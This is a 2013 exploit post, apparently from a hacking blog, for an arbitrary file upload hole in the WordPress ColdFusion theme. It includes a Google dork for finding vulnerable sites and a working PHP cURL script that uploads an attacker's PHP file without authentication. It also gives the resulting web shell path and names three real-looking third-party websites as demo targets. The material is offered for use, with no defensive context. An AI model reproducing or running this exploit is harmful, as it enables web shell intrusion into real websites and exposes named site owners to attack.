WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability

######################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-r...io/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
######################################################


= = = = = = = =
1)Exploit =
2)Real Demo =
= = = = = = = =

1)Exploit :
= = = = = =

<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp..._image.php
http://www.alias-photo.com/wp-content/th..._image.php
http://www.manuel-portela.com/wp-content..._image.php
# #### #### #### #### #### #### #### #### #

Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

# #### #### #### #### #### #### #### #### #
# Facebook Profile : http://www.fb.com/smailmax
# E-mail : ur0@hotmail.com
# #### #### #### #### #### #### #### #### #
##### Fi Khatr : > Smail Fox, Ped Rou, Ŝimõõw Any #####
##### Safouane Saw, RootMax, DrShano, Novice Exe #####
##### Abdelaziz Babiz, Youness El Amri, Salah Soultan #####
##### Âh Mêd, Docteur Virùs, Le-MîSstèr Tàriik #####
##### Sam7o Li Ila Nsit Chi Wa7d :( ./Smail Max #####
##### W A L I D A <3 #####

0 comments:

Never Forget To Say Thanks :D

Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.